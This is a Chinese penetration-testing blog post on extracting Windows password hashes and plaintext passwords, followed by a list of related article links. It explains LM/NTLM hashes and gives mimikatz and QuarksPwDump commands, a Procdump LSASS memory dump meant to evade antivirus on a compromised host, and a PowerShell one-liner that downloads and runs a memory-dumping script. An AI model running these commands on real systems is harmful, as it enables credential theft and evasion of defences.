首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络)

首先介绍一下windows密码Hash:

早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令,我们称之为hash(中文:哈希),Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。

NTLM-Hash与LM-Hash算法相比,明文口令大小写敏感,但无法根据NTLM-Hash判断原始明文口令是否小于8字节,摆脱了魔术字符串"KGS!@#$%"。MD4是真正的单向哈希函数,穷举做为数据源出现的明文,难度较大。问题在于,微软一味强调NTLM-Hash的强度高,却避而不谈一个事实,为了保持向后兼容性,NTLM-Hash缺省总是与LM-Hash一起使用的。这意味着NTLM-Hash强调再高也是无助于安全的,相反潜在损害着安全性。增加NTLM-Hash后,首先利用LM-Hash的弱点穷举出原始明文口令的大小写不敏感版本,再利用NTLM-Hash修正出原始明文口令的大小写敏感版本。

Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值,例如:

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::表示

用户名称为:Administrator

RID为:500

LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EE

NT-HASH值为:683020925C5D8569C23AA724774CE6CC

如果你知道这个用户的hash密码了,拿着C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC去hash在线查询网站。

一般我用QuarksPwDump_v0.2b来抓取整个windows系列的密码hash,在windows server 2003那是一抓一个准,得到的hash值在http://www.objectif-securite.ch/en/ophcrack.php简直是秒破。那么,问题来了,我在windows server 2008 和windows server2012下抓取的密码却是有些奇怪,按照软件介绍windows server2008和windows server2012都是可以抓取的。好了,我还是结合虚拟机系统来说明一下。目前正好虚拟机打开的是windows server2012,那就先用它来演示一下吧。

QuarksPwDump抓取密码的命令如下:(其他命令可以参考软件说明)

quarkspwdump.exe -dhl

结合图示,我们来看一下:

好像是抓取了系统的Hash了,按照前面对windows Hash知识的介绍:

LM-HASH的值是AAD3B435B51404EEAAD3B435B51404EE

NT-HASH的值是CE770E312D64AE0933D455B994E9C97D

那好,我拿得到的整个HASH值拿去在线破解,结果如下:

破解不出来,对不对。这下是不是觉得很囧。

我们拿出另一款密码抓取神器mimikatz来试一下,和上面的结果做一下比较。命令如下:

首先输入命令:

privilege::debug

接着输入命令:

sekurlsa::logonpasswords

图示结果如下:

有没有发现,mimikatz和QuarksPwDump抓取的LM-HASH是不同的,而且mimikatz直接就把系统密码给取到了。NT-HASH两款软件得到的结果是一样的。

好,再说一点渗透测试过程中的思路,我也是昨天才知道,渗透测试真的是一个漫长的经验积累过程。先说下场景,我已经chopper连上对方主机,但是系统默认安装了360杀毒软件和360安全卫士。我上传的mimikatz和QuarksPwDump都被查杀了。也就是说我想利用这两款软件常规思路获取系统的密码HASH已经是不太可能了。其实,我们可以先dump对方主机的LSASS内存文件,然后在自己主机用mimikatz进行处理,这样就可以得到对方主机的系统HASH和密码了。还是以虚拟机的windows server2012还演示一下。

可以到微软的官方网站下载ProDump,最新版本为v7.01,这个肯定不会引起杀毒软件的报毒和查杀了。

命令如下:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

图示如下:

接下来,再演示一下本地用mimikatz进行破解:

首先输入命令:

mimikatz.exe "sekurlsa::minidump lsass.dmp"

接着输入命令:

sekurlsa::logonpasswords

结果图示如下:

可以看到,能够得到离线得到系统密码,这样就可以在对方主机上绕过杀毒软件的查杀了。

在乌云知识库中也有看到利用PowerShell完成Prodump一样工作的命令。具体命令如下:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"

在虚拟机下的windows server2012下进行尝试,结果失败了,不知道什么鬼:

继续尝试,又成功了。囧,如图所示:

在虚拟机中windows server2008中进行尝试,得到如下图所示:

进行破解,得到如下图所示:

我在被渗透主机上进行尝试过,发现也是可行的,不过chopper的虚拟终端下会显示错误,实际上已经成功执行Powershell代码。不过总体感觉还是Prodump用起来更加方便。

对了,Metasploit中也有集成mimkatz的。具体教程可以参考http://www.offensive-security.com/metasploit-unleashed/Mimikatz

好了,就说到这里。算是留个笔记,仅供渗透交流学习,请不要用于非法途径

转载于:https://www.cnblogs.com/hiccup/p/4380298.html

关于Windows系列密码抓取相关推荐

  1. Windows系统密码抓取与防护

    Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eea ...

  2. 内网安全之:Windows 密码抓取

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  3. SSH Keylogger密码抓取

    简介 SSH Keylogger终端切换用户记录用户输入的终端信息可获取密码 主要利用strace系统调试工具获取ssh的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用. Strace ...

  4. windows使用mitmproxy抓取http、https数据

    安装 python3环境下安装:pip3 install mitmproxy 说明:由于mitmproxy命令不支持Windows系统,所以可以使用mitmdump或mitmweb 使用mitmdum ...

  5. windows密码抓取的多种方法

    0x01 准备阶段 1.下载pwdump7: 链接:https://pan.baidu.com/s/1zhSJTNnAl43BHblWU3nI5A 提取码:f74o 解压密码:321      (为啥 ...

  6. 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  7. 数据爬取-奇技淫巧系列1——抓取隐藏在CDN,防爬代理等服务后面的数据

    准备写个数据爬取的技巧系列Blog,不定时更新 互联网上爬虫和反爬大战已愈演愈烈,不同段位的选手在相互交锋,有时候爬数据采用比较温和的方式就能获取到,但是碰到难啃的骨头,就必须要采用一些奇技淫巧,于是 ...

  8. JavaCV音视频开发宝典:JavaCV使用gdigrab方式实现windows录屏(windows屏幕画面抓取/采集,可实现高帧率屏幕截屏、录屏功能)

    <JavaCV音视频开发宝典>专栏目录导航 <JavaCV音视频开发宝典>专栏介绍和目录 前言 本系列文章前面内容基本覆盖了推流拉流等内容,屏幕截屏之前也写过,只不过是基于ja ...

  9. HackBrowserData密码抓取

    一.简介 hack-browser-data是一个开源工具,可以帮助您从浏览器解密数据(密码|书签| cookie |历史记录|信用卡|下载链接).它支持市场上最受欢迎的浏览器,并可以在Windows ...

最新文章

  1. GLFW--Getting started
  2. 史上最难逻辑题!据说99.9%的人都做不出来……
  3. jsp导入jstl标签库_EE JSP:使用JSTL标记库生成动态内容
  4. php表单验证内容不能为空,php校验表单检测字段是否为空的方法_PHP教程
  5. 线性插值改变图像尺寸_图像分割--gt;上采样的那些事
  6. 问题 D: 求圆的面积和周长 山东科技大学oj c 语言
  7. ant-Design------select的option 随页面滚动的问题
  8. linux 命令的高级用法(chmod+find 批量授权)(转载)
  9. mysql如何彻底卸载_windows如何彻底卸载mysql
  10. 邮箱如何设置smtp服务器端口,如何改变你的SMTP端口来允许发送电子邮件
  11. kettle 完成处理后的字母含义,(I)nput, (O)utput, (R)ead, (W)ritten, (U)pdated, (E)rror
  12. 蓝桥杯web开发-5道模拟题让你信心满满
  13. 自动化测试处理银行密码输入框
  14. 手速最快的是电竞选手?错了,是程序员
  15. 爬虫-招聘系列2----boss某直聘
  16. DYNAMIC MOVEMENT PRIMITIVES PART 1: THE BASICS
  17. GPRS的工作原理、主要特点(转自aerkate)
  18. python从pdf文件中提取文本,并自动翻译
  19. 电商数仓zabbix
  20. USACO 2020 February Contest, Gold

热门文章

  1. python 数据恢复软件_linux数据恢复工具
  2. java毕业设计美容中心在线后台管理系统源码+lw文档+mybatis+系统+mysql数据库+调试
  3. 盘点这些年错过的互联网暴富机会,大部分人都后知后觉
  4. Huffman 编码 实验报告
  5. DFT中scan shift/launch/capture过程,launch off shfit/launch from capture OCC
  6. 《学习敏捷 构建高效团队》 读书笔记 —— (一)学习敏捷
  7. 一篇非常不错的微信软文!
  8. web开发培训,CSS颜色基本样式
  9. Windows组件没有Internet信息服务(IIS)选项解决设置方法
  10. 用于卫星信号载波的宽带频谱分析仪(上)